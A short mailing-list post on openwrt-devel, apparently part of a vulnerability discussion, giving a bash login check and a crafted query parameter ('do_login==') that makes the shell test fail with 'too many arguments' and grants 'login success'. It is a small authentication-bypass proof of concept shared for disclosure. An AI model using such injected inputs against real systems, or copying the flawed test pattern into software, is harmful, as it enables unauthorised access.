Hi!
> Could you quote an example or deliver an exploit?
A example for the BASH:
if [ -z "$do_login" -o "$user" != 'foo' -o "$password" != 'bar' ]; then
echo login faild
else
echo login success
fi
Normal:
http://[...]/[...]?do_login=1&user=foo&password=unknown
Output:
login faild
Exploit:
http://[...]/[...]?do_login==&user=foo&password=unknown
Output:
bash: [: too many arguments
login success
Regards
Alina
_______________________________________________
openwrt-devel mailing list
openwrt-devel@lists.openwrt.org
https://lists.openwrt.org/mailman/listinfo/openwrt-devel
